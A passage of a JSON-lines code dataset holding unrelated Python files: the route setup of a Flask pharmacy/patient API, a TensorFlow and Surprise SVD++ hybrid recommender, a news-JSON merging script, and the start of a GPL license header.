)\n\n\n\"\"\" User Api \"\"\"\napi.add_resource(UserRegister, \"/register\")\napi.add_resource(UserLogin, \"/login\")\napi.add_resource(UserLogout, \"/logout\")\n\napi.add_resource(Users, \"/users\")\napi.add_resource(User, \"/user/\")\n\n\"\"\" Roles Api \"\"\"\napi.add_resource(UserRole, '/role')\napi.add_resource(UserRoles, '/roles')\n\n\"\"\" Drugs \"\"\"\napi.add_resource(Drugs, '/drugs')\napi.add_resource(RegisterDrug, '/drug')\napi.add_resource(Drug, '/drug/')\napi.add_resource(DrugName, '/drug/')\napi.add_resource(DoctorDrug, '/doctor_drug')\n\n\"\"\" search by id search national_id add patient add recipe \"\"\"\n\"\"\" Doctor Api \"\"\"\napi.add_resource(PatientSearchById, 
'/search')\napi.add_resource(PatientSearchByNationalId, '/search/national_id')\napi.add_resource(Patient, '/patient')\napi.add_resource(Patients, '/patients')\n\napi.add_resource(Recipe, '/recipe')\napi.add_resource(SearchRecipeById, '/recipe/search/')\napi.add_resource(RecipeSpend, '/recipe_spend')\n\n\n# @app.before_first_request\n# def create_tables():\n# role = RoleModel(name='admin')\n# # pharmacy = RoleModel(name='pharmacy')\n# # pharmacy.save_to_db()\n# # doctor = RoleModel(name='doctor')\n# # doctor.save_to_db()\n#\n# role.save_to_db()\n# admin = UserModel(username='admin', email='admin@admin.com', password='1234', role_id=role.id)\n# admin.save_to_db()\n\n@app.teardown_appcontext\ndef shutdown_session(exception=None):\n db.session.remove()\n\n\nif __name__ == \"__main__\":\n db.init_app(app)\n ma.init_app(app)\n app.run(port=5000, debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"188012416","text":"import operator\nimport time\nfrom collections import Counter\nfrom typing import List, Dict, Tuple, Optional\nfrom collections import defaultdict\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nimport tensorflow.keras.backend as K\nfrom bidict import bidict\nfrom more_itertools import flatten\nfrom sklearn.model_selection import StratifiedKFold\nfrom surprise import Dataset\nfrom surprise import Reader\nfrom surprise import SVDpp\nfrom tensorflow import keras\n\nfrom .hybrid_recommender import HybridRecommender\nfrom .logging import getLogger\nfrom .recommendation_base import EntityType\nfrom .utils import normalize_affinity_scores_by_user_item, RatingPredRegularization, get_rng, \\\n LRSchedule, resnet_layer_with_content, ScaledGlorotNormal, root_mean_squared_error, mean_absolute_error, \\\n normalize_affinity_scores_by_user_item_bs\n\n\nclass HybridRecommenderSVDpp(HybridRecommender):\n def __init__(self, embedding_mapper: dict, knn_params: Optional[dict], rating_scale: Tuple[float, float],\n n_content_dims: int = 32, n_collaborative_dims: int = 32):\n super().__init__(embedding_mapper, knn_params, rating_scale, n_content_dims, n_collaborative_dims)\n self.log = getLogger(type(self).__name__)\n\n def __build_svd_model__(self, user_item_affinities, svdpp, rating_scale, user_ids, item_ids, n_folds=1):\n start = time.time()\n models = []\n svd_uv, svd_iv = None, None\n affinities = []\n reader = Reader(rating_scale=rating_scale)\n rng_state = np.random.get_state()\n random_int = np.random.randint(1e8)\n assert n_folds >= 1\n\n def train_svd(train_affinities, ):\n svd_train = pd.DataFrame(train_affinities)\n svd_train = Dataset.load_from_df(svd_train, reader).build_full_trainset()\n np.random.set_state(rng_state)\n svd_model = SVDpp(random_state=random_int, **svdpp)\n svd_model.fit(svd_train)\n\n svd_inner_users = [svd_model.trainset.to_inner_uid(u) if svd_model.trainset.knows_user(u) else \"\"\n for\n u in user_ids]\n svd_known_users = [svd_model.trainset.knows_user(u) for u in svd_inner_users]\n svd_uv_1 = np.vstack([svd_model.pu[u] if k else np.random.rand(svdpp['n_factors']) * 0.001 for u, k in\n zip(svd_inner_users, svd_known_users)])\n\n svd_inner_items = [svd_model.trainset.to_inner_iid(i) if svd_model.trainset.knows_item(i) else \"\"\n for\n i in item_ids]\n svd_known_items = [svd_model.trainset.knows_item(i) for i in svd_inner_items]\n svd_iv_1 = np.vstack([svd_model.qi[i] if k else 
np.random.rand(svdpp['n_factors']) * 0.001 for i, k in\n zip(svd_inner_items, svd_known_items)])\n return svd_model, svd_uv_1, svd_iv_1\n\n if n_folds == 1:\n svd_model, svd_uv, svd_iv = train_svd(user_item_affinities)\n svd_validation = pd.DataFrame(user_item_affinities)\n svd_validation = Dataset.load_from_df(svd_validation, reader).build_full_trainset().build_testset()\n svd_predictions = svd_model.test(svd_validation)\n validation_affinities = [(p.uid, p.iid, p.r_ui - p.est) for p in svd_predictions]\n affinities = validation_affinities\n models.append(svd_model)\n\n else:\n user_item_affinities = np.array(user_item_affinities)\n users_for_each_rating = np.array([u for u, i, r in user_item_affinities])\n X, y = user_item_affinities, users_for_each_rating\n skf = StratifiedKFold(n_splits=n_folds)\n for train_index, test_index in skf.split(X, y):\n train_affinities, validation_affinities = X[train_index], X[test_index]\n train_affinities = [(u, i, int(r)) for u, i, r in train_affinities]\n svd_model, svd_uv_1, svd_iv_1 = train_svd(train_affinities)\n models.append(svd_model)\n if svd_uv is None:\n svd_uv = svd_uv_1\n else:\n svd_uv = np.concatenate((svd_uv, svd_uv_1), axis=1)\n\n if svd_iv is None:\n svd_iv = svd_iv_1\n else:\n svd_iv = np.concatenate((svd_iv, svd_iv_1), axis=1)\n\n validation_affinities = [(u, i, int(r)) for u, i, r in validation_affinities]\n svd_validation = pd.DataFrame(validation_affinities)\n svd_validation = Dataset.load_from_df(svd_validation, reader).build_full_trainset().build_testset()\n svd_predictions = svd_model.test(svd_validation)\n validation_affinities = [(p.uid, p.iid, p.r_ui - p.est) for p in svd_predictions]\n affinities.extend(validation_affinities)\n\n #\n assert len(models) == n_folds\n self.log.debug(\"Training %s SVD Models in time = %.1f\", len(models), time.time() - start)\n return models, svd_uv, svd_iv, affinities\n\n def __build_dataset__(self, user_ids: List[str], item_ids: List[str],\n user_item_affinities: List[Tuple[str, str, float]],\n user_content_vectors: np.ndarray, item_content_vectors: np.ndarray,\n user_vectors: np.ndarray, item_vectors: np.ndarray,\n user_id_to_index: Dict[str, int], item_id_to_index: Dict[str, int],\n rating_scale: Tuple[float, float], hyperparams: Dict):\n batch_size = hyperparams[\"batch_size\"] if \"batch_size\" in hyperparams else 512\n use_svd = hyperparams[\"use_svd\"] if \"use_svd\" in hyperparams else False\n svdpp = hyperparams[\"svdpp\"] if \"svdpp\" in hyperparams else {\"n_factors\": 8, \"n_epochs\": 10}\n n_svd_folds = hyperparams[\"n_svd_folds\"] if \"n_svd_folds\" in hyperparams else 5\n padding_length = hyperparams[\"padding_length\"] if \"padding_length\" in hyperparams else 100\n n_content_dims = user_content_vectors.shape[1]\n n_collaborative_dims = user_vectors.shape[1]\n\n noise_augmentation = hyperparams[\"noise_augmentation\"] if \"noise_augmentation\" in hyperparams else False\n rng = get_rng(noise_augmentation)\n user_content_vectors_mean = np.mean(user_content_vectors)\n item_content_vectors_mean = np.mean(item_content_vectors)\n user_vectors_mean = np.mean(user_vectors)\n item_vectors_mean = np.mean(item_vectors)\n self.log.debug(\n \"For rng regularization, user_content_vectors_mean = %s, item_content_vectors_mean = %s, user_vectors_mean = %s, item_vectors_mean = %s\",\n user_content_vectors_mean, item_content_vectors_mean, user_vectors_mean, item_vectors_mean)\n\n if use_svd:\n models, svd_uv, svd_iv, user_item_affinities = self.__build_svd_model__(\n user_item_affinities, svdpp, 
rating_scale, user_ids, item_ids, n_svd_folds)\n assert len(models) == n_svd_folds\n else:\n models, svd_uv, svd_iv = [], np.zeros((len(user_ids), 1)), np.zeros((len(item_ids), 1))\n n_svd_dims = svd_uv.shape[1]\n assert svd_iv.shape[1] == svd_uv.shape[1]\n user_svd_mean = np.mean(svd_uv)\n item_svd_mean = np.mean(svd_iv)\n ###\n ratings = np.array([r for u, i, r in user_item_affinities])\n min_affinity = np.min(ratings)\n max_affinity = np.max(ratings)\n affinity_range = max_affinity - min_affinity\n # user_item_affinities = [(u, i, (2 * (r - min_affinity) / (max_affinity - min_affinity)) - 1) for u, i, r in\n # user_item_affinities]\n mu, user_bias, item_bias, _, _ = normalize_affinity_scores_by_user_item_bs(user_item_affinities, rating_scale)\n\n def inverse_fn(user_item_predictions):\n rscaled = np.array([r for u, i, r in user_item_predictions])\n # rscaled = ((rscaled + 1) / 2) * (max_affinity - min_affinity) + min_affinity\n if use_svd:\n svd_predictions = np.array(\n [[model.predict(u, i).est for model in models] for u, i, r in\n user_item_predictions])\n svd_predictions = np.array(svd_predictions).mean(axis=1)\n rscaled = rscaled + svd_predictions\n return rscaled\n\n user_bias = np.array([user_bias[u] if u in user_bias else np.random.rand() * 0.01 for u in user_ids])\n item_bias = np.array([item_bias[i] if i in item_bias else np.random.rand() * 0.01 for i in item_ids])\n self.log.debug(\"Mu = %.4f, Max User Bias = %.4f, Max Item Bias = %.4f, use_svd = %s, min-max-affinity = %s\",\n mu, np.abs(np.max(user_bias)),\n np.abs(np.max(item_bias)), use_svd, (min_affinity, max_affinity))\n\n ratings_count_by_user = Counter([u for u, i, r in user_item_affinities])\n ratings_count_by_item = Counter([i for u, i, r in user_item_affinities])\n\n user_item_list = defaultdict(list)\n item_user_list = defaultdict(list)\n for i, j, r in user_item_affinities:\n user_item_list[i].append(item_id_to_index[j])\n item_user_list[j].append(user_id_to_index[i])\n\n user_item_affinities = list(sorted(user_item_affinities, key=operator.itemgetter(0)))\n\n def generate_training_samples(affinities: List[Tuple[str, str, float]]):\n def generator():\n for i, j, r in affinities:\n user = user_id_to_index[i]\n item = item_id_to_index[j]\n items = np.array(user_item_list[i])\n items = items[:padding_length]\n items = items + 1\n items = np.pad(items, (padding_length - len(items), 0), constant_values=(0, 0))\n\n users = np.array(item_user_list[j])\n users = users[:padding_length]\n users = users + 1\n users = np.pad(users, (padding_length - len(users), 0), constant_values=(0, 0))\n\n user_content = user_content_vectors[user] + rng(n_content_dims, 0.001 * user_content_vectors_mean)\n item_content = item_content_vectors[item] + rng(n_content_dims, 0.001 * item_content_vectors_mean)\n user_collab = user_vectors[user] + rng(n_collaborative_dims, 0.001 * user_vectors_mean)\n item_collab = item_vectors[item] + rng(n_collaborative_dims, 0.001 * item_vectors_mean)\n r = r + rng(1, 0.01 * affinity_range)\n\n ratings_by_user = np.log1p((ratings_count_by_user[i] + 10.0) / 10.0)\n ratings_by_item = np.log1p((ratings_count_by_item[j] + 10.0) / 10.0)\n nu = 1 / np.sqrt(ratings_count_by_user[i])\n ni = 1 / np.sqrt(ratings_count_by_item[j])\n if use_svd:\n user_svd = svd_uv[user] + rng(n_svd_dims, 0.001 * user_svd_mean)\n item_svd = svd_iv[item] + rng(n_svd_dims, 0.001 * item_svd_mean)\n yield (user, item, users, items, nu, ni, user_content, item_content, user_collab, item_collab,\n user_svd, item_svd, ratings_by_user, 
ratings_by_item), r\n else:\n yield (user, item, users, items, nu, ni, user_content, item_content, user_collab, item_collab,\n ratings_by_user, ratings_by_item), r\n\n return generator\n\n if use_svd:\n output_shapes = (\n ((), (), padding_length, padding_length, (), (), n_content_dims, n_content_dims, n_collaborative_dims,\n n_collaborative_dims,\n n_svd_dims,\n n_svd_dims, (), ()),\n ())\n output_types = (\n (tf.int64, tf.int64, tf.int64, tf.int64, tf.float64, tf.float64, tf.float64, tf.float64, tf.float64,\n tf.float64, tf.float64,\n tf.float64,\n tf.float64, tf.float64),\n tf.float64)\n else:\n output_shapes = (\n ((), (), padding_length, padding_length, (), (), n_content_dims, n_content_dims, n_collaborative_dims,\n n_collaborative_dims,\n (), ()),\n ())\n output_types = (\n (tf.int64, tf.int64, tf.int64, tf.int64, tf.float64, tf.float64, tf.float64, tf.float64, tf.float64,\n tf.float64,\n tf.float64, tf.float64),\n tf.float64)\n\n s = time.time()\n _ = [i for i in generate_training_samples(user_item_affinities)()]\n e = time.time()\n self.log.debug(\"Total time to Run Training Generator 1 EPOCH = %.1f\", e - s)\n train = tf.data.Dataset.from_generator(generate_training_samples(user_item_affinities),\n output_types=output_types, output_shapes=output_shapes, )\n\n train = train.batch(batch_size).shuffle(32).prefetch(32)\n return mu, user_bias, item_bias, inverse_fn, train, n_svd_dims, \\\n ratings_count_by_user, ratings_count_by_item, svd_uv, svd_iv, \\\n min_affinity, max_affinity, user_item_list, item_user_list\n\n def __build_prediction_network__(self, user_ids: List[str], item_ids: List[str],\n user_item_affinities: List[Tuple[str, str, float]],\n user_content_vectors: np.ndarray, item_content_vectors: np.ndarray,\n user_vectors: np.ndarray, item_vectors: np.ndarray,\n user_id_to_index: Dict[str, int], item_id_to_index: Dict[str, int],\n rating_scale: Tuple[float, float], hyperparams: Dict):\n self.log.debug(\n \"Start Building Prediction Network, collaborative vectors shape = %s, content vectors shape = %s\",\n (user_vectors.shape, item_vectors.shape), (user_content_vectors.shape, item_content_vectors.shape))\n\n lr = hyperparams[\"lr\"] if \"lr\" in hyperparams else 0.001\n epochs = hyperparams[\"epochs\"] if \"epochs\" in hyperparams else 15\n batch_size = hyperparams[\"batch_size\"] if \"batch_size\" in hyperparams else 512\n network_width = hyperparams[\"network_width\"] if \"network_width\" in hyperparams else 2\n network_depth = hyperparams[\"network_depth\"] if \"network_depth\" in hyperparams else 3\n verbose = hyperparams[\"verbose\"] if \"verbose\" in hyperparams else 1\n kernel_l2 = hyperparams[\"kernel_l2\"] if \"kernel_l2\" in hyperparams else 0.0\n bias_regularizer = hyperparams[\"bias_regularizer\"] if \"bias_regularizer\" in hyperparams else 0.0\n rating_regularizer = hyperparams[\"rating_regularizer\"] if \"rating_regularizer\" in hyperparams else 0.0\n dropout = hyperparams[\"dropout\"] if \"dropout\" in hyperparams else 0.0\n use_svd = hyperparams[\"use_svd\"] if \"use_svd\" in hyperparams else False\n use_implicit = hyperparams[\"use_implicit\"] if \"use_implicit\" in hyperparams else False\n use_dnn = hyperparams[\"use_dnn\"] if \"use_dnn\" in hyperparams else False\n padding_length = hyperparams[\"padding_length\"] if \"padding_length\" in hyperparams else 100\n\n use_resnet = hyperparams[\"use_resnet\"] if \"use_resnet\" in hyperparams else False\n resnet_content_each_layer = hyperparams[\n \"resnet_content_each_layer\"] if \"resnet_content_each_layer\" in 
hyperparams else False\n\n n_content_dims = user_content_vectors.shape[1]\n n_collaborative_dims = user_vectors.shape[1]\n\n assert user_content_vectors.shape[1] == item_content_vectors.shape[1]\n assert user_vectors.shape[1] == item_vectors.shape[1]\n\n mu, user_bias, item_bias, inverse_fn, train, \\\n n_svd_dims, ratings_count_by_user, ratings_count_by_item, \\\n svd_uv, svd_iv, min_affinity, \\\n max_affinity, user_item_list, item_user_list = self.__build_dataset__(user_ids, item_ids,\n user_item_affinities,\n user_content_vectors,\n item_content_vectors,\n user_vectors, item_vectors,\n user_id_to_index,\n item_id_to_index,\n rating_scale, hyperparams)\n assert svd_uv.shape[1] == svd_iv.shape[1] == n_svd_dims\n self.log.debug(\"DataSet Built with n_svd_dims = %s, use_svd = %s\", n_svd_dims, use_svd)\n input_user = keras.Input(shape=(1,))\n input_item = keras.Input(shape=(1,))\n input_users = keras.Input(shape=(padding_length,))\n input_items = keras.Input(shape=(padding_length,))\n input_nu = keras.Input(shape=(1,))\n input_ni = keras.Input(shape=(1,))\n\n input_1 = keras.Input(shape=(n_content_dims,))\n input_2 = keras.Input(shape=(n_content_dims,))\n input_3 = keras.Input(shape=(n_collaborative_dims,))\n input_4 = keras.Input(shape=(n_collaborative_dims,))\n input_5 = keras.Input(shape=(1,))\n input_6 = keras.Input(shape=(1,))\n inputs = [input_user, input_item, input_users, input_items,\n input_nu, input_ni, input_1, input_2, input_3, input_4, input_5, input_6]\n if use_svd:\n input_svd_uv = keras.Input(shape=(n_svd_dims,))\n input_svd_iv = keras.Input(shape=(n_svd_dims,))\n inputs = [input_user, input_item, input_users, input_items,\n input_nu, input_ni, input_1, input_2, input_3, input_4, input_svd_uv,\n input_svd_iv,\n input_5, input_6]\n\n embeddings_initializer = tf.keras.initializers.Constant(user_bias)\n user_bias = keras.layers.Embedding(len(user_ids), 1, input_length=1,\n embeddings_initializer=embeddings_initializer)(input_user)\n\n item_initializer = tf.keras.initializers.Constant(item_bias)\n item_bias = keras.layers.Embedding(len(item_ids), 1, input_length=1,\n embeddings_initializer=item_initializer)(input_item)\n user_bias = keras.layers.ActivityRegularization(l2=bias_regularizer)(user_bias)\n item_bias = keras.layers.ActivityRegularization(l2=bias_regularizer)(item_bias)\n user_bias = tf.keras.layers.Flatten()(user_bias)\n item_bias = tf.keras.layers.Flatten()(item_bias)\n\n def main_network():\n initializer = tf.keras.initializers.TruncatedNormal(stddev=0.1)\n embeddings_initializer = tf.keras.initializers.Constant(user_vectors)\n user_vec = keras.layers.Embedding(len(user_ids), n_collaborative_dims, input_length=1)(input_user)\n\n item_initializer = tf.keras.initializers.Constant(item_vectors)\n item_vec = keras.layers.Embedding(len(item_ids), n_collaborative_dims, input_length=1,\n embeddings_initializer=initializer)(input_item)\n\n user_initializer = tf.keras.initializers.Constant(\n np.concatenate((np.array([[0.0] * n_collaborative_dims]), user_vectors), axis=0))\n user_vecs = keras.layers.Embedding(len(user_ids) + 1, n_collaborative_dims,\n input_length=padding_length, mask_zero=True)(input_users)\n user_vecs = keras.layers.ActivityRegularization(l2=bias_regularizer)(user_vecs)\n user_vecs = tf.keras.layers.GlobalAveragePooling1D()(user_vecs)\n user_vecs = user_vecs * input_ni\n\n item_initializer = tf.keras.initializers.Constant(\n np.concatenate((np.array([[0.0] * n_collaborative_dims]), item_vectors), axis=0))\n item_vecs = 
keras.layers.Embedding(len(item_ids) + 1, n_collaborative_dims,\n input_length=padding_length, mask_zero=True,\n embeddings_initializer=initializer)(input_items)\n item_vecs = keras.layers.ActivityRegularization(l2=bias_regularizer)(item_vecs)\n item_vecs = tf.keras.layers.GlobalAveragePooling1D()(item_vecs)\n item_vecs = item_vecs * input_nu\n\n user_vec = keras.layers.ActivityRegularization(l2=bias_regularizer)(user_vec)\n item_vec = keras.layers.ActivityRegularization(l2=bias_regularizer)(item_vec)\n user_vec = tf.keras.layers.Flatten()(user_vec)\n item_vec = tf.keras.layers.Flatten()(item_vec)\n user_item_vec_dot = tf.keras.layers.Dot(axes=1, normalize=False)([user_vec, item_vec])\n item_items_vec_dot = tf.keras.layers.Dot(axes=1, normalize=False)([item_vec, item_vecs])\n user_user_vec_dot = tf.keras.layers.Dot(axes=1, normalize=False)([user_vec, user_vecs])\n implicit_term = user_item_vec_dot + item_items_vec_dot + user_user_vec_dot\n\n user_content = input_1\n item_content = input_2\n user_collab = input_3\n item_collab = input_4\n\n user_item_content_similarity = tf.keras.layers.Dot(axes=1, normalize=True)([user_content, item_content])\n user_item_collab_similarity = tf.keras.layers.Dot(axes=1, normalize=True)([user_collab, item_collab])\n\n ratings_by_user = input_5\n ratings_by_item = input_6\n\n vectors = [user_content, item_content, user_collab, item_collab, user_vec, item_vec, item_vecs, user_vecs]\n counts_data = keras.layers.Dense(8, activation=\"tanh\", use_bias=False)(\n K.concatenate([ratings_by_user, ratings_by_item, input_nu, input_ni, ]))\n meta_data = [counts_data, user_item_content_similarity, user_item_collab_similarity,\n item_bias, user_bias, implicit_term, item_items_vec_dot, user_item_vec_dot, user_user_vec_dot]\n if use_svd:\n user_svd = input_svd_uv\n item_svd = input_svd_iv\n user_item_svd_similarity = tf.keras.layers.Dot(axes=1, normalize=False)([user_svd, item_svd])\n vectors.extend([user_svd, item_svd])\n meta_data.append(user_item_svd_similarity)\n\n vectors = K.concatenate(vectors)\n meta_data = K.concatenate(meta_data)\n meta_data = keras.layers.Dense(64, activation=\"tanh\", )(meta_data)\n\n dense_representation = K.concatenate([meta_data, vectors])\n # dense_representation = tf.keras.layers.BatchNormalization()(dense_representation)\n initial_dense_representation = dense_representation if resnet_content_each_layer else None\n self.log.info(\"Start Training: lr = %.5f, use_dnn = %s, use_implicit = %s,use_svd = %s, \" +\n \"use_resnet = %s, dense_dims = %s, vector shape = %s, \" +\n \"network_depth = %s, network width = %s, dropout = %.2f, \",\n lr, use_dnn, use_implicit, use_svd, use_resnet,\n dense_representation.shape, vectors.shape,\n network_depth, network_width, dropout)\n\n dims_fn = lambda x: int(\n np.interp(x, [0, network_depth - 1], [dense_representation.shape[1] * 2, network_width]))\n for i in range(0, network_depth):\n dims = dims_fn(i)\n if use_resnet:\n dense_representation = resnet_layer_with_content(dims, dims, dropout, kernel_l2)(\n dense_representation, initial_dense_representation)\n\n else:\n dense_representation = keras.layers.Dense(dims, activation=\"tanh\", use_bias=False,\n kernel_initializer=ScaledGlorotNormal(),\n kernel_regularizer=keras.regularizers.l1_l2(\n l2=kernel_l2))(\n dense_representation)\n # dense_representation = tf.keras.layers.BatchNormalization()(dense_representation)\n dense_representation = tf.keras.layers.Dropout(dropout)(dense_representation)\n\n rating = keras.layers.Dense(1, activation=\"linear\", 
use_bias=False, kernel_initializer=ScaledGlorotNormal(),\n kernel_regularizer=keras.regularizers.l1_l2(l2=kernel_l2))(\n dense_representation)\n result = 0.0\n if use_implicit:\n result += implicit_term\n if use_dnn:\n rating = keras.layers.ActivityRegularization(l2=bias_regularizer)(rating)\n result += rating\n return result\n\n rating = tf.keras.backend.constant(mu) + user_bias + item_bias + main_network()\n self.log.debug(\"Before Rating Regularization, min-max affinity for DNN = %s\", (min_affinity, max_affinity))\n rating = RatingPredRegularization(l2=rating_regularizer, min_r=min_affinity, max_r=max_affinity)(rating)\n\n model = keras.Model(inputs=inputs, outputs=[rating])\n\n learning_rate = LRSchedule(lr=lr, epochs=epochs, batch_size=batch_size, n_examples=len(user_item_affinities))\n sgd = tf.keras.optimizers.SGD(learning_rate=learning_rate, momentum=0.9, nesterov=True)\n model.compile(optimizer=sgd,\n loss=[root_mean_squared_error], metrics=[root_mean_squared_error, mean_absolute_error])\n\n model.fit(train, epochs=epochs, callbacks=[], verbose=verbose)\n\n prediction_artifacts = {\"model\": model, \"inverse_fn\": inverse_fn, \"user_item_list\": user_item_list,\n \"item_user_list\": item_user_list,\n \"ratings_count_by_user\": ratings_count_by_user, \"padding_length\": padding_length,\n \"ratings_count_by_item\": ratings_count_by_item,\n \"batch_size\": batch_size, \"svd_uv\": svd_uv, \"svd_iv\": svd_iv, \"use_svd\": use_svd}\n self.log.info(\"Built Prediction Network, model params = %s\", model.count_params())\n return prediction_artifacts\n\n def predict(self, user_item_pairs: List[Tuple[str, str]], clip=True) -> List[float]:\n start = time.time()\n model = self.prediction_artifacts[\"model\"]\n inverse_fn = self.prediction_artifacts[\"inverse_fn\"]\n ratings_count_by_user = self.prediction_artifacts[\"ratings_count_by_user\"]\n ratings_count_by_item = self.prediction_artifacts[\"ratings_count_by_item\"]\n svd_uv = self.prediction_artifacts[\"svd_uv\"]\n svd_iv = self.prediction_artifacts[\"svd_iv\"]\n batch_size = self.prediction_artifacts[\"batch_size\"]\n use_svd = self.prediction_artifacts[\"use_svd\"]\n user_item_list = self.prediction_artifacts[\"user_item_list\"]\n item_user_list = self.prediction_artifacts[\"item_user_list\"]\n padding_length = self.prediction_artifacts[\"padding_length\"]\n\n def generate_prediction_samples(affinities: List[Tuple[str, str]],\n global_user_id_to_index: Dict[str, int],\n global_item_id_to_index: Dict[str, int],\n user_id_to_index: Dict[str, int], item_id_to_index: Dict[str, int],\n user_content_vectors: np.ndarray, item_content_vectors: np.ndarray,\n user_vectors: np.ndarray, item_vectors: np.ndarray,\n svd_uv: np.ndarray, svd_iv: np.ndarray,\n ratings_count_by_user: Counter, ratings_count_by_item: Counter):\n def generator():\n for i, j in affinities:\n user_idx = global_user_id_to_index[i]\n item_idx = global_item_id_to_index[j]\n items = np.array(user_item_list[i])\n items = items[:padding_length]\n items = items + 1\n items = np.pad(items, (padding_length - len(items), 0), constant_values=(0, 0))\n\n users = np.array(item_user_list[j])\n users = users[:padding_length]\n users = users + 1\n users = np.pad(users, (padding_length - len(users), 0), constant_values=(0, 0))\n\n user = user_id_to_index[i]\n item = item_id_to_index[j]\n user_content = user_content_vectors[user]\n item_content = item_content_vectors[item]\n user_collab = user_vectors[user]\n item_collab = item_vectors[item]\n nu = 1 / np.sqrt(ratings_count_by_user[i])\n ni = 
1 / np.sqrt(ratings_count_by_item[j])\n ratings_by_user = np.log1p((ratings_count_by_user[i] + 10.0) / 10.0)\n ratings_by_item = np.log1p((ratings_count_by_item[j] + 10.0) / 10.0)\n if use_svd:\n user_svd = svd_uv[user_idx]\n item_svd = svd_iv[item_idx]\n yield user_idx, item_idx, users, items, nu, ni, user_content, item_content, \\\n user_collab, item_collab, user_svd, item_svd, \\\n ratings_by_user, ratings_by_item\n else:\n yield user_idx, item_idx, users, items, nu, ni, user_content, item_content, \\\n user_collab, item_collab, \\\n ratings_by_user, ratings_by_item\n\n return generator\n\n user_ids = list(set([u for u, i in user_item_pairs]))\n item_ids = list(set([i for u, i in user_item_pairs]))\n user_vectors = self.get_embeddings([(u, EntityType.USER) for u in user_ids])\n item_vectors = self.get_embeddings([(i, EntityType.ITEM) for i in item_ids])\n\n user_id_to_index = bidict(zip(user_ids, list(range(len(user_ids)))))\n item_id_to_index = bidict(zip(item_ids, list(range(len(item_ids)))))\n user_vectors = np.array(user_vectors)\n item_vectors = np.array(item_vectors)\n assert user_vectors.shape[0] == len(user_ids)\n assert item_vectors.shape[0] == len(item_ids)\n if self.content_data_used:\n user_content_vectors = user_vectors[:, :self.n_content_dims]\n item_content_vectors = item_vectors[:, :self.n_content_dims]\n assert user_content_vectors.shape[1] == item_content_vectors.shape[1] == self.n_content_dims\n user_vectors = user_vectors[:, self.n_content_dims:]\n item_vectors = item_vectors[:, self.n_content_dims:]\n else:\n user_content_vectors = user_vectors\n item_content_vectors = item_vectors\n\n n_svd_dims = svd_uv.shape[1]\n if use_svd:\n output_shapes = (\n (), (), padding_length, padding_length, (), (), self.n_content_dims, self.n_content_dims,\n self.n_collaborative_dims,\n self.n_collaborative_dims, n_svd_dims, n_svd_dims, (), ())\n output_types = (\n tf.int64, tf.int64, tf.int64, tf.int64, tf.float64, tf.float64, tf.float64, tf.float64, tf.float64,\n tf.float64, tf.float64, tf.float64, tf.float64, tf.float64)\n else:\n output_shapes = (\n (), (), padding_length, padding_length, (), (), self.n_content_dims, self.n_content_dims,\n self.n_collaborative_dims,\n self.n_collaborative_dims, (), ())\n output_types = (\n tf.int64, tf.int64, tf.int64, tf.int64, tf.float64, tf.float64, tf.float64, tf.float64, tf.float64,\n tf.float64, tf.float64, tf.float64)\n predict = tf.data.Dataset.from_generator(generate_prediction_samples(user_item_pairs,\n self.user_id_to_index,\n self.item_id_to_index,\n user_id_to_index, item_id_to_index,\n user_content_vectors, item_content_vectors,\n user_vectors, item_vectors, svd_uv, svd_iv,\n ratings_count_by_user,\n ratings_count_by_item),\n output_types=output_types, output_shapes=output_shapes, )\n predict = predict.batch(batch_size).prefetch(16)\n model_start_time = time.time()\n predictions = np.array(list(flatten([model.predict(x).reshape((-1)) for x in predict])))\n model_end_time = time.time()\n model_time = model_end_time - model_start_time\n assert len(predictions) == len(user_item_pairs)\n users, items = zip(*user_item_pairs)\n invert_start = time.time()\n predictions = inverse_fn([(u, i, r) for u, i, r in zip(users, items, predictions)])\n if clip:\n predictions = np.clip(predictions, self.rating_scale[0], self.rating_scale[1])\n self.log.debug(\n \"Finished Predicting for n_samples = %s, time taken = %.2f, Model Time Taken = %.2f, Invert time = %.2f\",\n len(user_item_pairs), time.time() - start,\n model_time, time.time() - 
invert_start)\n return predictions\n","sub_path":"hwer/hybrid_recommender_svdpp.py","file_name":"hybrid_recommender_svdpp.py","file_ext":"py","file_size_in_byte":34249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"94494024","text":"import json\n\n'''\n[{\n title:\"title\",\n link : \"link\", \n contents: \"contents\",\n datetime: \"date\"\n},...]\n'''\n\nyears = [2016, 2017, 2018, 2019, 2020, 2021]\ndays_28 = [2]\ndays_31 = [1,3,5,7,8,10,12]\n\ndef ret_days(year, month):\n \n if month in days_31:\n return 31\n elif month in days_28:\n if (year%4 == 0):\n return 29\n else:\n return 28\n else:\n return 30\n\ndef load_jsons(year, month):\n #file name format : \"year-month-1_year-month-enddaysnews.json\"\n file_name = \"{0}-{1}-1_{0}-{1}-{2}news.json\".format(year, month, ret_days(year, month))\n path = './scraper/'+file_name\n with open(path, 'r') as file:\n json_data = json.load(file)\n for arts in json_data:\n arts['content'] = arts['content'].replace(\"\\n\",\" \")\n return json_data\n\nif __name__ == \"__main__\":\n merge_dict_list = []\n for year in years:\n if (year == 2016):\n for month in range(3,13):\n json_data = load_jsons(year, month)\n for data in json_data:\n merge_dict_list.append(data)\n #print(json_data)\n elif (year == 2021):\n for month in range(1,3):\n json_data = load_jsons(year, month)\n for data in json_data:\n merge_dict_list.append(data)\n else:\n for month in range(1,13):\n json_data = load_jsons(year, month)\n for data in json_data:\n merge_dict_list.append(data)\n merge_dict_list = sorted(merge_dict_list, key= lambda k: k['date'], reverse = False)\n with open('merged_data.json', 'w') as merge_file:\n json.dump(merge_dict_list, merge_file, indent=4)","sub_path":"merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"412062939","text":"#!/usr/bin/python2\n#\n# Chris Lumens \n#\n# Copyright 2007 Red Hat, Inc.\n#\n# This copyrighted material is made available to anyone wishing to use, modify,\n# copy, or redistribute it subject to the terms and conditions of the GNU\n# General Public License v.2. This program is distributed in the hope that it\n# will be useful, but WITHOUT ANY WARRANTY expressed or implied, including the\n# implied warranties of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n# See the GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License along with\n# this program; if not, write to the Free Software 